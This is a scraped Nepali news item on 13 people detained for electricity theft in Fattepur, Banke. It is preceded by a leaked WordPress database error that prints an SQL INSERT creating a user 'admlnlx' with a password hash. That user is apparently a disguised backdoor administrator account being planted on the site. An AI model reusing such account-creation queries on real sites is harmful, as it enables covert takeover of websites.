WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNTUveVovd4DOiTYzpYViYuMiNnwZI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:02:05', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,माघ ५-
बांकेको फत्तेपुरमा नेपाल विद्युत् प्राधिकरण नेपालगन्ज वितरण केन्द्रले विद्युत् चोरी गर्ने १३ जनालाई नियन्त्रणमा लिएको छ । विद्युत चोरी गर्ने क्रममा विद्युतीय सामानसहित मानिसलाई समेत नियन्त्रणमा लिएर कारवाही गरिएको हो ।
कारवाहीवाट १ लाख ५० हजार विद्युत् चोरीबापत जरिवाना असुल गरिएको कार्यालय प्रमुख उमेश झाले जानाकारी दिनुभयो ।उहांले दैनिक रुपमा अनुगमन र कारवाहीलाई तिव्रता दिएको समेत वताउनु भयो ।विद्युत् कर्मचारी, जनपथ प्रहरी र सशस्त्र प्रहरीको संयुक्त टोलीले अनुगमनमा खटिएको छ ।